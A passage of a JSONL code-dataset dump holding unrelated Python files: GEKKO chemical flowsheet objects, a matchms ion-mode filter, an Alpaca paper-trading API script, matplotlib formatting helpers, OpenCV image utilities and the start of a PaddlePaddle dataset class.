expression\r\n Tin = self.m.Var()\r\n self.m.Equation(Tin==T)\r\n else:\r\n td = False\r\n\r\n # build thermo object with unique object name\r\n thermo_name = 'thermo_' + str(len(self.m._objects) + 1)\r\n self.m._objects.append(thermo_name+'=thermo_'+prop)\r\n\r\n # add connections between y and thermo object attribute y\r\n if not td: # not temperature dependent\r\n y = {}\r\n i = 0\r\n for c in self.m._compounds:\r\n i += 1\r\n y[c] = self.m.Param()\r\n self.m._connections.append(y[c].name+'='+thermo_name+'.'+prop+'['+str(i)+']')\r\n else: # temperature dependent\r\n y = {}\r\n i = 0\r\n for c in self.m._compounds:\r\n i += 1\r\n y[c] = self.m.Var()\r\n self.m._connections.append(y[c].name+'='+thermo_name+'.'+prop+'['+str(i)+']')\r\n # link temperature\r\n y['T'] = Tin\r\n self.m._connections.append(Tin.name+'='+thermo_name+'.T')\r\n \r\n # add units and property description\r\n if (prop=='mw'): y['units']='kg/kmol'; y['property']='Molecular Weight'\r\n if (prop=='tc'): y['units']='K'; y['property']='Critical Temperature'\r\n if (prop=='pc'): y['units']='Pa'; y['property']='Critical Pressure'\r\n if (prop=='vc'): y['units']='m^3/kmol'; y['property']='Critical Volume'\r\n if (prop=='ccf'): y['units']='unitless'; y['property']='Crit Compress Factor'\r\n if (prop=='mp'): y['units']='K'; y['property']='Melting Point'\r\n if (prop=='tpt'): y['units']='K'; y['property']='Triple Pt Temperature'\r\n if (prop=='tpp'): y['units']='Pa'; y['property']='Triple Pt Pressure'\r\n if (prop=='nbp'): y['units']='K'; y['property']='Normal Boiling Point'\r\n if (prop=='lmv'): y['units']='m^3/kmol'; y['property']='Liq Molar Volume'\r\n if (prop=='ighf'): y['units']='J/kmol'; y['property']='IG Heat of Formation'\r\n if (prop=='iggf'): y['units']='J/kmol'; y['property']='IG Gibbs of Formation'\r\n if (prop=='igae'): y['units']='J/kmol-K'; y['property']='IG Absolute Entropy'\r\n if (prop=='shf'): y['units']='J/kmol'; y['property']='Std Heat of Formation'\r\n if (prop=='sgf'): y['units']='J/kmol'; y['property']='Std Gibbs of Formation'\r\n if (prop=='sae'): y['units']='J/kmol-K'; y['property']='Std Absolute Entropy'\r\n if (prop=='hfmp'): y['units']='J/kmol'; y['property']='Heat Fusion at Melt Pt'\r\n if (prop=='snhc'): y['units']='J/kmol'; y['property']='Std Net Heat of Comb'\r\n if (prop=='af'): y['units']='unitless'; y['property']='Acentric Factor'\r\n if (prop=='rg'): y['units']='m'; y['property']='Radius of Gyration'\r\n if (prop=='sp'): y['units']='(J/m^3)^0.5'; y['property']='Solubility Parameter'\r\n if (prop=='dm'): y['units']='c*m'; y['property']='Dipole Moment'\r\n if (prop=='r'): y['units']='m^3/kmol'; y['property']='van der Waals Volume'\r\n if (prop=='q'): y['units']='m^2'; y['property']='van der Waals Area'\r\n if (prop=='ri'): y['units']='unitless'; y['property']='Refractive Index'\r\n if (prop=='fp'): y['units']='K'; y['property']='Flash Point'\r\n if (prop=='lfl'): y['units']='K'; y['property']='Lower Flammability Limit'\r\n if (prop=='ufl'): y['units']='K'; y['property']='Upper Flammability Limit'\r\n if (prop=='lflt'): y['units']='K'; y['property']='Lower Flamm Limit Temp'\r\n if (prop=='uflt'): y['units']='K'; y['property']='Upper Flamm Limit Temp'\r\n if (prop=='ait'): y['units']='K'; y['property']='Auto Ignition Temp'\r\n if (prop=='sd'): y['units']='kmol/m^3'; y['property']='Solid Density'\r\n if (prop=='ld'): y['units']='kmol/m^3 '; y['property']='Liquid Density'\r\n if (prop=='svp'): y['units']='Pa '; y['property']='Solid Vapor Pressure'\r\n if (prop=='lvp'): y['units']='Pa '; y['property']='Liquid Vapor Pressure'\r\n if (prop=='hvap'): y['units']='J/kmol '; y['property']='Heat of Vaporization'\r\n if (prop=='scp'): y['units']='J/kmol-K '; y['property']='Solid Heat Capacity'\r\n if (prop=='lcp'): y['units']='J/kmol-K '; y['property']='Liquid Heat Capacity'\r\n if (prop=='igcp'): y['units']='J/kmol-K '; y['property']='Ideal Gas Heat Capacity'\r\n if (prop=='svc'): y['units']='m^3/kmol '; y['property']='Second Virial Coefficient'\r\n if (prop=='lv'): y['units']='Pa*s '; y['property']='Liquid Viscosity'\r\n if (prop=='vv'): y['units']='Pa*s '; y['property']='Vapor Viscosity'\r\n if (prop=='sk'): y['units']='W/m-K '; y['property']='Solid Thermal Conductivity'\r\n if (prop=='lk'): y['units']='W/m-K '; y['property']='Liq Thermal Conductivity'\r\n if (prop=='vk'): y['units']='W/m-K '; y['property']='Vap Thermal Conductivity'\r\n if (prop=='st'): y['units']='N/m '; y['property']='Surface Tension'\r\n if (prop=='sh'): y['units']='J/kmol '; y['property']='Solid Enthalpy'\r\n if (prop=='lh'): y['units']='J/kmol '; y['property']='Liq Enthalpy'\r\n if (prop=='vh'): y['units']='J/kmol '; y['property']='Vap Enthalpy'\r\n \r\n return y\r\n\r\nclass StreamObj:\r\n '''Stream Object\r\n P = Pressure (Pa)\r\n T = Temperature (K)\r\n ndot = Molar flow rate (kmol/sec)\r\n x = Array of mole fractions\r\n phase = Phase (solid, liquid, vapor)\r\n '''\r\n name = ''\r\n P = None\r\n T = None\r\n ndot = None\r\n x = []\r\n phase = None\r\n \r\nclass ReserveObj:\r\n '''Reserve Object\r\n P = Pressure (Pa)\r\n T = Temperature (K)\r\n n = Molar holdup (kmol)\r\n x = Array of mole fractions\r\n phase = Phase (solid, liquid, vapor)\r\n '''\r\n name = ''\r\n P = None\r\n T = None\r\n n = None\r\n x = []\r\n phase = None\r\n\r\nclass FlashObj:\r\n '''Flash Object\r\n P = Pressure (Pa)\r\n T = Temperature (K)\r\n Q = Heat input (kJ/sec)\r\n gamma = Activity coefficients\r\n n = Molar holdup in flash column (kmol)\r\n inlet = Inlet stream\r\n reserve = Molar holdup\r\n vapor = Vapor stream\r\n liquid = Liquid stream\r\n '''\r\n name = ''\r\n P = None\r\n T = None\r\n Q = None\r\n gamma = []\r\n n = None\r\n inlet = ''\r\n reserve = ''\r\n vapor = ''\r\n liquid = ''\r\n\r\nclass Flowsheet(): \r\n def __init__(self,m,stream_level=1):\r\n # record the GEKKO instances where the objects are added\r\n self.m = m\r\n self.sl = stream_level # use pressure and energy balance\r\n if self.sl>=1:\r\n # use t,p,h,ndot,x[i] with STREAM_LEVEL = 1\r\n # models such as flash or other VLE require this\r\n self.m.options.STREAM_LEVEL = 1\r\n else:\r\n # use ndot,x[i] with STREAM_LEVEL = 0\r\n # track compositions only for blending and transport calculations\r\n self.m.options.STREAM_LEVEL = 0\r\n return\r\n \r\n def connect_streams(self,s1,s2):\r\n '''Connect two streams\r\n The first stream dictates the properties of the combined stream.\r\n \r\n connect_streams(s1,s2)\r\n \r\n s1 = stream object or name of stream 1 (string)\r\n s2 = stream object or name of stream 2 (string)\r\n '''\r\n try:\r\n c1 = s1.name\r\n except:\r\n c1 = s1\r\n \r\n try:\r\n c2 = s2.name\r\n except:\r\n c2 = s2\r\n # add connection for streams with * to connect all elements\r\n try:\r\n self.m._connections.append(c1+'.*='+c2+'.*')\r\n except:\r\n raise Exception('Function connect_streams: inputs must be strings or objects with a name property')\r\n return\r\n \r\n def set_phase(self,y,phase='liquid'):\r\n '''Set Phase\r\n set_phase(y,phase='liquid')\r\n\r\n Set phase of a Stream or Reserve Object as 'solid', 'liquid', or 'vapor'\r\n '''\r\n # stream phase\r\n if phase==None:\r\n self.m._connections.append(y.name+'.sfrc=0')\r\n self.m._connections.append(y.name+'.lfrc=0')\r\n self.m._connections.append(y.name+'.vfrc=1')\r\n else:\r\n if not (type(phase)==type('string')):\r\n raise Exception('Phase must be a string: solid, liquid, or vapor')\r\n if phase.lower()=='solid':\r\n self.m._connections.append(y.name+'.sfrc=1')\r\n self.m._connections.append(y.name+'.lfrc=0')\r\n self.m._connections.append(y.name+'.vfrc=0')\r\n elif phase.lower()=='liquid':\r\n self.m._connections.append(y.name+'.sfrc=0')\r\n self.m._connections.append(y.name+'.lfrc=1')\r\n self.m._connections.append(y.name+'.vfrc=0')\r\n elif phase.lower()=='vapor':\r\n self.m._connections.append(y.name+'.sfrc=0')\r\n self.m._connections.append(y.name+'.lfrc=0')\r\n self.m._connections.append(y.name+'.vfrc=1')\r\n else:\r\n raise Exception('Phase must be a string: solid, liquid, or vapor')\r\n\r\n return\r\n\r\n def stream(self,sobj=None):\r\n '''\r\n stream(sobj=None)\r\n\r\n Stream Object: \r\n sobj = StreamObj()\r\n P = Pressure (Pa)\r\n T = Temperature (K)\r\n ndot = Molar flow rate (kmol/sec)\r\n x = Array of mole fractions\r\n ph = Phase (Integer with 1=solid, 2=liquid, 3=vapor)\r\n '''\r\n self._thermo_obj = True\r\n if sobj==None:\r\n y = StreamObj()\r\n else:\r\n y = sobj\r\n\r\n # build stream (Feed) object with unique object name\r\n y.name = 'stream_' + str(len(self.m._objects) + 1)\r\n self.m._objects.append(y.name+'=Feed')\r\n \r\n if self.sl>=1:\r\n # pressure\r\n if y.P==None:\r\n y.P = self.m.Param(101325.0)\r\n else:\r\n if not isinstance(y.P,(GKVariable,GKParameter)):\r\n # create input variable if it is an expression\r\n Pin = self.m.Var()\r\n self.m.Equation(Pin==y.P)\r\n y.P = Pin\r\n # temperature\r\n if y.T==None:\r\n y.T = self.m.Param(300.0)\r\n else:\r\n if not isinstance(y.T,(GKVariable,GKParameter)):\r\n # create input variable if it is an expression\r\n Tin = self.m.Var()\r\n self.m.Equation(Tin==y.T)\r\n y.T = Tin\r\n # stream phase\r\n if y.phase==None:\r\n y.phase = 'liquid'\r\n self.m._connections.append(y.name+'.sfrc=0')\r\n self.m._connections.append(y.name+'.lfrc=0')\r\n self.m._connections.append(y.name+'.vfrc=1')\r\n else:\r\n if not (type(y.phase)==type('string')):\r\n raise Exception('Phase must be a string: solid, liquid, or vapor')\r\n if y.phase.lower()=='solid':\r\n self.m._connections.append(y.name+'.sfrc=1')\r\n self.m._connections.append(y.name+'.lfrc=0')\r\n self.m._connections.append(y.name+'.vfrc=0')\r\n elif y.phase.lower()=='liquid':\r\n self.m._connections.append(y.name+'.sfrc=0')\r\n self.m._connections.append(y.name+'.lfrc=1')\r\n self.m._connections.append(y.name+'.vfrc=0')\r\n elif y.phase.lower()=='vapor':\r\n self.m._connections.append(y.name+'.sfrc=0')\r\n self.m._connections.append(y.name+'.lfrc=0')\r\n self.m._connections.append(y.name+'.vfrc=1')\r\n else:\r\n raise Exception('Phase must be a string: solid, liquid, or vapor')\r\n # molar flow\r\n if y.ndot==None:\r\n y.ndot = self.m.Param(1.0)\r\n else:\r\n if not isinstance(ndot,(GKVariable,GKParameter)):\r\n # create input variable if it is an expression\r\n ndotin = self.m.Var()\r\n self.m.Equation(ndotin==y.ndot)\r\n y.ndot = ndotin\r\n # mole fractions\r\n if y.x==[]:\r\n y.x = [None]*len(self.m._compounds)\r\n for i in range(len(self.m._compounds)):\r\n y.x[i] = self.m.Param(1.0/max(1.0,float(len(self.m._compounds))))\r\n else:\r\n if len(y.x)!=len(self.m._compounds):\r\n raise Exception('Error: length of mole fraction variable array (x) must match number of declared compounds: '+str(len(self.m._compounds)))\r\n for i in range(len(self.m._compounds)):\r\n if not isinstance(y.x[i],(GKVariable,GKParameter)):\r\n # create input variable if it is an expression\r\n xi = self.m.Var()\r\n self.m.Equation(xi==y.x[i])\r\n y.x[i] = xi\r\n # additional equation for last mole fraction\r\n if isinstance(y.x[i],GKVariable):\r\n self.m.Equation(y.x[-1]==1-sum(y.x[0:-1]))\r\n\r\n self.m._connections.append(y.P.name+'='+y.name+'.P')\r\n self.m._connections.append(y.T.name+'='+y.name+'.T')\r\n self.m._connections.append(y.ndot.name+'='+y.name+'.ndot')\r\n # don't connect last mole fraction to stream stream object (explicit calc)\r\n for i in range(len(self.m._compounds)-1):\r\n self.m._connections.append(y.x[i].name+'='+y.name+'.x['+str(i+1)+']')\r\n \r\n return y \r\n\r\n def flash(self,fo=None):\r\n '''\r\n flash(fo=None)\r\n\r\n Input: Flash object\r\n P = Pressure (Pa)\r\n T = Temperature (K)\r\n Q = Heat input (kJ/sec)\r\n inlet = inlet stream name\r\n vapor = vapor outlet stream name\r\n liquid = liquid outlet stream name\r\n '''\r\n self._thermo_obj = True\r\n if fo==None:\r\n y = FlashObj()\r\n else:\r\n y = fo\r\n \r\n # build flash object with unique object name\r\n y.name = 'flash_' + str(len(self.m._objects) + 1)\r\n self.m._objects.append(y.name+'=Flash')\r\n \r\n if self.sl==0:\r\n raise Exception('Stream level required >=1 for flash calculation')\r\n \r\n # pressure\r\n if y.P==None:\r\n y.P = self.m.Param(101325.0)\r\n else:\r\n if not isinstance(y.P,(GKVariable,GKParameter)):\r\n # create input variable if it is an expression\r\n Pin = self.m.Var()\r\n self.m.Equation(Pin==y.P)\r\n y.P = Pin\r\n # temperature\r\n if y.T==None:\r\n y.T = self.m.Var(300.0)\r\n else:\r\n if not isinstance(y.T,(GKVariable,GKParameter)):\r\n # create input variable if it is an expression\r\n Tin = self.m.Var()\r\n self.m.Equation(Tin==y.T)\r\n y.T = Tin\r\n # heat input\r\n if y.Q==None:\r\n y.Q = self.m.Param(0.0)\r\n else:\r\n if not isinstance(y.Q,(GKVariable,GKParameter)):\r\n # create input variable if it is an expression\r\n Qin = self.m.Var()\r\n self.m.Equation(Qin==y.Q)\r\n y.Q = Qin\r\n # activity coefficients\r\n if y.gamma==[]:\r\n y.gamma = [None]*len(self.m._compounds)\r\n for i in range(len(self.m._compounds)):\r\n y.gamma[i] = self.m.Param(1.0)\r\n else:\r\n if len(y.gamma)!=len(self.m._compounds):\r\n raise Exception('Error: length of activity coefficient array (gamma) must match number of declared compounds: '+str(len(self.m._compounds)))\r\n for i in range(len(self.m._compounds)):\r\n if not isinstance(y.gamma[i],(GKVariable,GKParameter)):\r\n # create input variable if it is an expression\r\n gi = self.m.Var()\r\n self.m.Equation(gi==y.gamma[i])\r\n y.gamma[i] = gi\r\n # names of inlet stream (1) and outlet streams (2)\r\n y.inlet = y.name + '.inlet'\r\n y.vapor = y.name + '.outlet_vap'\r\n y.liquid = y.name + '.outlet_liq'\r\n\r\n # connect to flash and stream pressure, temperature (outlet)\r\n self.m._connections.append(y.P.name+'='+y.inlet+'.P')\r\n self.m._connections.append(y.T.name+'='+y.liquid+'.T')\r\n self.m._connections.append(y.Q.name+'='+y.name+'.Q')\r\n \r\n for i in range(len(self.m._compounds)):\r\n self.m._connections.append(y.gamma[i].name+'='+y.name+'.gamma['+str(i+1)+']')\r\n \r\n return y\r\n\r\n\r\n def flash_column(self,fo=None):\r\n '''\r\n flash_column(fo=None)\r\n\r\n Input: Flash object\r\n P = Pressure (Pa)\r\n T = Temperature (K)\r\n Q = Heat input (kJ/sec)\r\n n = Holdup (kmol)\r\n inlet = inlet stream name\r\n vapor = vapor outlet stream name\r\n liquid = liquid outlet stream name\r\n '''\r\n self._thermo_obj = True\r\n if fo==None:\r\n y = FlashObj()\r\n else:\r\n y = fo\r\n \r\n # build flash object with unique object name\r\n y.name = 'flash_column_' + str(len(self.m._objects) + 1)\r\n self.m._objects.append(y.name+'=Flash_Column')\r\n \r\n if self.sl==0:\r\n raise Exception('Stream level required >=1 for flash calculation')\r\n \r\n # pressure\r\n if y.P==None:\r\n y.P = self.m.Param(101325.0)\r\n else:\r\n if not isinstance(y.P,(GKVariable,GKParameter)):\r\n # create input variable if it is an expression\r\n Pin = self.m.Var()\r\n self.m.Equation(Pin==y.P)\r\n y.P = Pin\r\n # temperature\r\n if y.T==None:\r\n y.T = self.m.Var(300.0)\r\n else:\r\n if not isinstance(y.T,(GKVariable,GKParameter)):\r\n # create input variable if it is an expression\r\n Tin = self.m.Var()\r\n self.m.Equation(Tin==y.T)\r\n y.T = Tin\r\n # heat input\r\n if y.Q==None:\r\n y.Q = self.m.Param(0.0)\r\n else:\r\n if not isinstance(y.Q,(GKVariable,GKParameter)):\r\n # create input variable if it is an expression\r\n Qin = self.m.Var()\r\n self.m.Equation(Qin==y.Q)\r\n y.Q = Qin\r\n # molar holdup\r\n if y.n==None:\r\n y.n = self.m.Param(1.0)\r\n else:\r\n if not isinstance(y.n,(GKVariable,GKParameter)):\r\n # create input variable if it is an expression\r\n nin = self.m.Var()\r\n self.m.Equation(nin==y.n)\r\n y.n = nin\r\n # activity coefficients\r\n if y.gamma==[]:\r\n y.gamma = [None]*len(self.m._compounds)\r\n for i in range(len(self.m._compounds)):\r\n y.gamma[i] = self.m.Param(1.0)\r\n else:\r\n if len(y.gamma)!=len(self.m._compounds):\r\n raise Exception('Error: length of activity coefficient array (gamma) must match number of declared compounds: '+str(len(self.m._compounds)))\r\n for i in range(len(self.m._compounds)):\r\n if not isinstance(y.gamma[i],(GKVariable,GKParameter)):\r\n # create input variable if it is an expression\r\n gi = self.m.Var()\r\n self.m.Equation(gi==y.gamma[i])\r\n y.gamma[i] = gi\r\n # names of inlet stream (1) and outlet streams (2)\r\n y.inlet = y.name + '.feed'\r\n y.reserve = y.name + '.holdup.reserve'\r\n y.vapor = y.name + '.flash.outlet_vap'\r\n y.liquid = y.name + '.flash.outlet_liq'\r\n\r\n # connect to flash and stream pressure, temperature (outlet)\r\n self.m._connections.append(y.P.name+'='+y.inlet+'.P')\r\n self.m._connections.append(y.T.name+'='+y.liquid+'.T')\r\n self.m._connections.append(y.Q.name+'='+y.name+'.flash.Q')\r\n self.m._connections.append(y.Q.name+'='+y.reserve+'.n')\r\n \r\n for i in range(len(self.m._compounds)):\r\n self.m._connections.append(y.gamma[i].name+'='+y.name+'.flash.gamma['+str(i+1)+']')\r\n \r\n return y\r\n\r\n \r\n# def holdup\r\n \r\n# def flash(self,prop,T=300.0):\r\n\r\n # --- flowsheet objects in APMonitor but not GEKKO ---\r\n # feedback,\r\n \r\n# mass, massflow, massflows, molarflows \r\n# mixer, pid, poly_reactor, pump, reactor, recovery, splitter,\r\n# stage_1, stage_2, stream_lag, thermo, vessel, vesselm\r\n","sub_path":"gekko/chemical.py","file_name":"chemical.py","file_ext":"py","file_size_in_byte":25095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"362834284","text":"from ..importing import load_adducts\nfrom ..typing import SpectrumType\n\n\ndef derive_ionmode(spectrum_in: SpectrumType, adducts_filename: str = None) -> SpectrumType:\n \"\"\"Derive missing ionmode based on adduct.\n\n Some input formates (e.g. MGF files) do not always provide a correct ionmode.\n This function reads the adduct from the metadata and uses this to fill in the\n correct ionmode where missing.\n\n Parameters\n ----------\n spectrum:\n Input spectrum.\n adducts_filename:\n Load known adducts from file, if filename is given. Default is None.\n Method makes sure that file loading is cached.\n\n Returns:\n --------\n\n Returns Spectrum object with `ionmode` attribute set.\n \"\"\"\n\n if spectrum_in is None:\n return None\n\n spectrum = spectrum_in.clone()\n\n # Load lists of known adducts\n known_adducts = load_adducts(filename=adducts_filename)\n\n adduct = spectrum.get(\"adduct\", None)\n # Harmonize adduct string\n if adduct:\n adduct = adduct.replace(\"\\n\", \"\") \\\n .replace(\" \", \"\") \\\n .replace(\"[\", \"\") \\\n .replace(\"]\", \"\") \\\n .replace(\"*\", \"\")\n\n ionmode = spectrum.get(\"ionmode\")\n if ionmode:\n assert ionmode == ionmode.lower(), (\"Ionmode field not harmonized.\",\n \"Apply 'make_ionmode_lowercase' filter first.\")\n\n # Try completing missing or incorrect ionmodes\n if ionmode not in [\"positive\", \"negative\"]:\n if adduct in known_adducts[\"adducts_positive\"]:\n ionmode = \"positive\"\n print(\"Added ionmode '\" + ionmode + \"' based on adduct: \", adduct)\n elif adduct in known_adducts[\"adducts_negative\"]:\n ionmode = \"negative\"\n print(\"Added ionmode '\" + ionmode + \"' based on adduct: \", adduct)\n else:\n ionmode = \"n/a\"\n spectrum.set(\"ionmode\", ionmode)\n\n return spectrum\n","sub_path":"matchms/filtering/derive_ionmode.py","file_name":"derive_ionmode.py","file_ext":"py","file_size_in_byte":1974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"648088446","text":"import requests\nimport json\nfrom config import *\n\nHEADERS = {'APCA-API-KEY-ID': API_KEY, 'APCA-API-SECRET-KEY': SECRET_KEY}\nBASE_URL = 'https://paper-api.alpaca.markets'\nACCOUNT_URL = '{}/v2/account'.format(BASE_URL)\nORDERS_URL = '{}/v2/orders'.format(BASE_URL)\n\n\ndef get_account():\n r = requests.get(ACCOUNT_URL, headers=HEADERS)\n\n return json.loads(r.content)\n\ndef create_order(symbol, qty, side, type, time_in_force):\n data = {\n 'symbol': symbol,\n 'qty': qty,\n 'side': side,\n 'type': type,\n 'time_in_force': time_in_force\n }\n\n r = requests.post(ORDERS_URL, json=data, headers=HEADERS)\n\n return json.loads(r.content)\n\ndef get_orders():\n r = requests.get(ORDERS_URL, headers=HEADERS)\n\n return json.loads(r.content)\n\ndef cancel_order(order_id):\n orders_url_id = '{}/'.format(ORDERS_URL) + order_id\n\n r = requests.delete(orders_url_id, headers=HEADERS)\n\n return r\n\n#response = create_order('SE', 100, 'buy', 'market', 'gtc')\n#response = create_order('AAPL', 100, 'buy', 'market', 'gtc')\n\norders = get_orders()\nprint(orders)\n\nconfirmation = cancel_order('id_for_your_order')\nprint('\\n\\nConfirmation:')\nprint(confirmation)","sub_path":"PaperTrade/PaperTrade.py","file_name":"PaperTrade.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"420948332","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as tkr\n\ndef qpUtilPlotBuffer(ax, x, y):\n \"\"\"\n Creates narrow border around plot arrow. \n Prevents plot icons from being clipped by plot edges.\n \"\"\"\n xLim = ax.get_xlim()\n yLim = ax.get_ylim()\n\n xMargin = (xLim[1] - xLim[0]) * x\n yMargin = (yLim[1] - yLim[0]) * y\n\n ax.set_xlim(xLim[0] - xMargin, xLim[1] + xMargin)\n ax.set_ylim(yLim[0] - yMargin, yLim[1] + yMargin)\n\ndef qpUtilLabelFormatter(ax, xUnits = None, yUnits = None, xSize = None, ySize = None):\n \"\"\"\n Info:\n Description:\n Formats tick labels as dolloars, percentages, or decimals.\n Parameters:\n ax : Axes object, default = None\n Axes object containing figure elements to be adjusted within function.\n xUnits : str, default = None\n Determines units of x-axis tick labels. None displays float. '%' displays percentages, \n '$' displays dollars.\n xSize : int or float, default = None\n x-axis label size\n yUnits : str, default = None\n Determines units of y-axis tick labels. None displays float. '%' displays percentages, \n '$' displays dollars.\n ySize : int or float, default = None\n y-axis label size\n \"\"\"\n # x-axis\n if xUnits == 'd':\n fmt = '${x:,.0f}'\n elif xUnits == 'dd':\n fmt = '${x:,.1f}'\n elif xUnits == 'ddd':\n fmt = '${x:,.2f}' \n elif xUnits == 'p':\n fmt = '{x:,.0f}%'\n elif xUnits == 'pp':\n fmt = '{x:,.1f}%'\n elif xUnits == 'ppp':\n fmt = '{x:,.2f}%'\n elif xUnits == 'f':\n fmt = '{x:,.0f}'\n elif xUnits == 'ff':\n fmt = '{x:,.1f}'\n elif xUnits == 'fff':\n fmt = '{x:,.2f}'\n elif xUnits == 'ffff':\n fmt = '{x:,.3f}'\n \n if xUnits is not None and xUnits != 's':\n tick = tkr.StrMethodFormatter(fmt)\n ax.xaxis.set_major_formatter(tick)\n\n for tk in ax.get_xticklabels():\n tk.set_fontsize(xSize)\n\n # y-axis\n if yUnits == 'd':\n fmt = '${x:,.0f}'\n elif yUnits == 'dd':\n fmt = '${x:,.1f}'\n elif yUnits == 'ddd':\n fmt = '${x:,.2f}' \n elif yUnits == 'p':\n fmt = '{x:,.0f}%'\n elif yUnits == 'pp':\n fmt = '{x:,.1f}%'\n elif yUnits == 'ppp':\n fmt = '{x:,.2f}%'\n elif yUnits == 'f':\n fmt = '{x:,.0f}'\n elif yUnits == 'ff':\n fmt = '{x:,.1f}'\n elif yUnits == 'fff':\n fmt = '{x:,.2f}'\n elif yUnits == 'ffff':\n fmt = '{x:,.3f}'\n \n if yUnits is not None and yUnits != 's':\n tick = tkr.StrMethodFormatter(fmt)\n ax.yaxis.set_major_formatter(tick)\n \n for tk in ax.get_yticklabels():\n tk.set_fontsize(ySize)\n\ndef qpUtilSetAxes(x, y, xThresh = 0.75, yThresh = 0.75):\n \"\"\"\n Dynamically set lower/upper limits of x/y axes.\n \"\"\"\n xMin = round(np.min(x), 5)\n xMax = round(np.max(x), 5)\n xChange = (xMax - xMin) / xMax\n xMin = 0 if 1.00 >= xChange >= xThresh else np.round(xMin,1)\n xMax = xMax + xMax * 0.1\n\n yMin = round(np.min(y), 5)\n yMax = round(np.max(y), 5)\n yChange = (yMax - yMin) / yMax\n yMin = 0 if 1.00 >= yChange >= yThresh else np.round(yMin,1)\n yMax = yMax + yMax * 0.1\n return xMin, xMax, yMin, yMax\n\n","sub_path":"CustomModules/quickplot/qpUtil.py","file_name":"qpUtil.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"265150859","text":"import cv2 as cv\nimport numpy as np\n\n\ndef resizeFrame(frame, dim=None, scale=None, inter=cv.INTER_AREA):\n \"\"\"Resize images or frames\n\n Args:\n frame (ndarray): image to resize`\n dim (tuple, optional): Destination dimensions. Defaults to None.\n scale (float, optional): Destination scale. Defaults to None.\n inter (cv.INTER, optional): Interpolation function. Defaults to cv.INTER_AREA.\n\n Returns:\n ndarray: Resised frame\n \"\"\"\n if dim and not scale:\n return cv.resize(frame, dim, interpolation=inter)\n elif dim and scale:\n width = int(dim[1] * scale)\n height = int(dim[0] * scale)\n dimension = (width, height)\n return cv.resize(frame, dimension, interpolation=inter)\n elif scale:\n width = int(frame.shape[1] * scale)\n height = int(frame.shape[0] * scale)\n dimension = (width, height)\n return cv.resize(frame, dimension, interpolation=inter)\n else:\n return frame\n\n\ndef fractionFrames(frame, fraction):\n \"\"\"Calculate the fraction dimension of a frame\n\n Args:\n frame (numpy.ndarray): Image frame\n fraction (float): fraction to compute\n\n Returns:\n (width, heigth): fraction for dimension\n \"\"\"\n return int(frame.shape[1] * (fraction)), int(frame.shape[0] * (fraction))\n\n","sub_path":"resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"419027742","text":"import sys, cv2\nimport numpy as np\n\n# 이미지 읽기\nim = cv2.imread('./NumImgs/numbers100.png')\n# 회색\ngray = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)\nblur = cv2.GaussianBlur(gray, (5,5), 0)\n\n# 경계를 이진값으로 변경 blockSize: 11 , c:2\n# 배경과 목적 이미지를 구분하기 위함\ntresh = cv2.adaptiveThreshold(blur, 255, 1,1,11,2)\n\n# 윤곽 추출\n# cv2.RETR_EXTERNAL : 가장 바깥 라인만 추출\ncontours, hierachy = cv2.findContours(tresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_TC89_KCOS)\n\nfor cnt in contours:\n x,y,w,h = cv2.boundingRect(cnt)\n if h < 20:\n continue # 너무작으면 스킵\n red = (0,0,255)\n # im 에 빨간색 사작형 추가.\n cv2.rectangle(im,(x,y),(x+w,y+h), red, 2)\ncv2.imwrite('./NumImgs/numbers100_cnt.png', im)\n","sub_path":"keras_07/openCV_Number2.py","file_name":"openCV_Number2.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"554074232","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n################################################################################\n# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n################################################################################\n\n\"\"\"\n Specify the brief poi_qac_personalized.py\n\"\"\"\nimport os\nimport sys\nimport six\nimport re\nimport time\nimport numpy as np\nimport random\nimport datetime\nimport paddle.fluid as fluid\n\nfrom datasets.base_dataset import BaseDataset\nfrom utils.common_lib import convert_to_unicode\n\nif six.PY2:\n reload(sys)\n sys.setdefaultencoding('utf-8')\n\nbase_rule = re.compile(\"[\\1\\2]\")\n\nclass PoiQacPersonalized(BaseDataset):\n \"\"\"\n PoiQacPersonalized dataset \n \"\"\"\n def __init__(self, flags):\n super(PoiQacPersonalized, self).__init__(flags)\n self.inited_dict = False\n\n def parse_context(self, inputs):\n \"\"\"\n provide input context\n \"\"\"\n\n \"\"\"\n set inputs_kv: please set key as the same as layer.data.name\n\n notice:\n (1)\n If user defined \"inputs key\" is different from layer.data.name,\n the frame will rewrite \"inputs key\" with layer.data.name\n (2)\n The param \"inputs\" will be passed to user defined nets class through\n the nets class interface function : net(self, FLAGS, inputs), \n \"\"\" \n inputs['prefix_letter_id'] = fluid.layers.data(name=\"prefix_letter_id\", shape=[1],\n dtype=\"int64\", lod_level=1)\n if self._flags.prefix_word_id:\n inputs['prefix_word_id'] = fluid.layers.data(name=\"prefix_word_id\", shape=[1],\n dtype=\"int64\", lod_level=1)\n if self._flags.use_geohash:\n inputs['prefix_loc_geoid'] = fluid.layers.data(name=\"prefix_loc_geoid\", shape=[40],\n dtype=\"int64\", lod_level=0)\n\n inputs['pos_name_letter_id'] = fluid.layers.data(name=\"pos_name_letter_id\", shape=[1],\n dtype=\"int64\", lod_level=1)\n 